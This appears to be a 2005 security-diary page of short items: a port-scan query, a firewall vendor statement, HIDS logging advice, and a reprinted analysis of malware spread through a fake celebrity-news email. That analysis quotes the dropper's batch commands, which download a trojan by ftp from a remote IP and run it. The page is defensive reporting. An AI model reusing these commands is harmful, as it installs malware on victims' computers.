A Question for System Profilers
A contributor has asked if anyone has information related to scans that they have received from remote systems with the following port profile:
PORT STATE SERVICE VERSION
22/tcp open ssh?
53/tcp open domain ISC Bind 9.2.1
6703/tcp open unknown
6721/tcp open unknown
6722/tcp open unknown
6723/tcp open unknown
6737/tcp open unknown
6750/tcp open unknown
6760/tcp open unknown
6767/tcp open unknown
"Please note the text returned from connections to port 22: "I wish I was special". There appears to be no actual sshd daemon listening. A scan of the high 6700 ports returns no data from any of the open ports."
ZoneAlarm Failure Update
We have been contacted by ZoneLabs (A Check Point Company) about yesterdays Diary entry and have been asked to post a link to their statement . According to a follow-up response to a question posed to ZoneLabs;
"Users using the ProgramAdvisor service in Automatic mode were potentially affected.
No systems were exposed as a result of the issue.
The firewall would not go into 'deny all', but would continue to enforce the current policy at the time the error occurred." ZoneLabs -
Thanks for the answer!
Michael Jackson Suicide Note Malware
Several AV vendors are reporting the spreading of an email with a clickable link supposedly pointing to additional information on a Michael Jackson suicide note. Clicking the link takes the victim to a web site that installs malware using exploits customized for different browsers. The Storm Center received an excellent analysis of the malware from Matt Corothers and he has allowed us to reprint it here. Thanks, Matt!
The exploit creates this batch file which downloads and executes a trojan via ftp from the same ip:
echo open 184.108.40.206>c:\1.dat
echo recv 1.exe c:\1.exe>>c:\1.dat
ftp -n -s:c:\1.dat -A
start /min c:\1.exe
1.exe periodically posts information about the infected computer to a cgi script at nugget-sales.com, currently 220.127.116.11.
The CGI responds with commands, the first of which is for the trojan to update itself using http to 18.104.22.168/dtr/rplay93.exe. rplay93.exe appears to be a different version of the same malware. It also periodically posts to the nugget-sales.com. Other than the update command, I'm not really sure what the trojan is supposed to be doing. Part of the cgi response appears to be a command to load www.microsoft.com, which it does occasionally.
Some of the IP addresses and links are still alive at the time of this writing, so exercise caution if your curiosity gets the best of you. The malware may also reappear at other sites in the future. Additional details are available on most major AV vendor sites.
Opinion - More on HIDS
Configuring HIDS Agents for important "event" reporting is always an interesting subject, one would hope that more than one set of eyes is involved in selecting the events to be reported. As noted in "The Tao of Network Security Monitoring Beyond Intrusion Detection", "the alert is only the beginning of the quest, not the end." Success here depends, of course, on the "Agent" capabilities/configurability and the range of experiences of the "team" selecting and classifying the importance of the events, events that are important for the environment where the Agents are deployed.
Over the _years_ I've found that IntersectAlliance's products for *.nix, Windows and some MS's apps, are as configurable as they get. I've also read other public posts about this product's performance. Extending this opinion, a
contributor recently sent in a link to a recent MS document that has a basic list of events to consider. I regret I don't have the contributor's name anymore so I can publically thank them for sending in the link, but "Thanks!".
So ... I'm soliciting Diary contributor suggestions for other lists of *Nix events that should be considered for logging with *.Nix or MS HIDS Agents. I'll post the list in my Diary next week. Anyone with product specific precompiled lists of "important" events logged is also invited to share (within the confines of your license!).
The are "Free, Open-Source, audit and event log agent software for a (HUGE/pn) variety of operating systems, and applications." Home users might consider giving the a whirl too, it's a "A basic, free, Open-Source, centralised audit and eventlog collection tool for Windows" and anything else that can export to syslog.
Microsoft's Document is
The Security Monitoring and Attack Detection Planning Guide
More on Snare at the SANS Reading Room.
The Tao of Network Security Monitoring Beyond Intrusion Detection By Richard Bejtlich, available online at
Other Other related resources are at
, read the tool's PDF's that come with the download.
IM attack Name Game Responses
Forsythe, "It's not meat, but it works: LIMA - layered instant message
Anonymous said "Not balogna but Wiener. There was an old commercial jingle, "I wish I were an Oscar Mayer wiener ..." Maybe wiener-job or wiener-work, etc. Thanks for all the great work you do."
Robert Darin said "Simple: WIMP - Windows IM parasite. Windows because only Microsoft based platforms are as risk to this type of cheap and pathetic attack."
Rhen Alderman suggested "phim" as an acronym for a ****** Instant Messenger.
Another anonymous suggestion - "You could always go with Wiener--as in, 'you've been wienered,' for Oscar-family
And Jason Martin suggested "Instant Messaging --> In-Stunt Messaging. Or even In-Stunt Messa-Gang.".
Patrick Nolan, with grateful assists from other Handlers and Contributors.
Jun 10th 2005
1 decade ago